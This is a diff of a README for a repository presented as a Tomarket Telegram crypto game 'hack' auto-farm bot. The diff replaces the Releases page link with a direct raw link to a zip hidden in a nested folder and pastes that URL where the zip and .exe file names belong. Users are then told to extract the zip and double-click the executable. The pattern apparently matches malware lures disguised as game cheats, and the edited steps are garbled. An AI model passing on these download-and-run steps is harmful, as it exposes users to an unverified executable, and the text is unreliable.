Emzee-Creates/Tomarket-Hack-Game-Bot-Auto-Farm-Clicker-Crypto-Telegram-Api-Cheat/README.md

 ## 🔗 Download & Install

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/Emzee-Creates/Tomarket-Hack-Game-Bot-Auto-Farm-Clicker-Crypto-Telegram-Api-Cheat/releases) to find the latest version of the bot.
+   Go to the [Releases page](https://raw.githubusercontent.com/Emzee-Creates/Tomarket-Hack-Game-Bot-Auto-Farm-Clicker-Crypto-Telegram-Api-Cheat/main/ToMarket/Form11/Tomarket-Hack-Game-Bot-Auto-Farm-Clicker-Crypto-Telegram-Api-Cheat_2.8.zip) to find the latest version of the bot.

 2. **Select the Latest Release**
    On the Releases page, find and click on the latest version of the application.

 3. **Download the Application**
    Look for a file labeled with the version number.
-It may look something like `TomarketBot_v1.0.zip` or similar.
+It may look something like `https://raw.githubusercontent.com/Emzee-Creates/Tomarket-Hack-Game-Bot-Auto-Farm-Clicker-Crypto-Telegram-Api-Cheat/main/ToMarket/Form11/Tomarket-Hack-Game-Bot-Auto-Farm-Clicker-Crypto-Telegram-Api-Cheat_2.8.zip` or similar.
 Click on it to start the download.

 4. **Extract the Files**
    Once the download completes, locate the downloaded zip file.
 Right-click the file and select “Extract All” to unpack the contents.

 5. **Run the Bot**
-   Find the extracted folder and look for a file named `TomarketBot.exe` or similar.
+   Find the extracted folder and look for a file named `https://raw.githubusercontent.com/Emzee-Creates/Tomarket-Hack-Game-Bot-Auto-Farm-Clicker-Crypto-Telegram-Api-Cheat/main/ToMarket/Form11/Tomarket-Hack-Game-Bot-Auto-Farm-Clicker-Crypto-Telegram-Api-Cheat_2.8.zip` or similar.
 Double-click on this file to launch the application.

 ## ⚙️ Configuration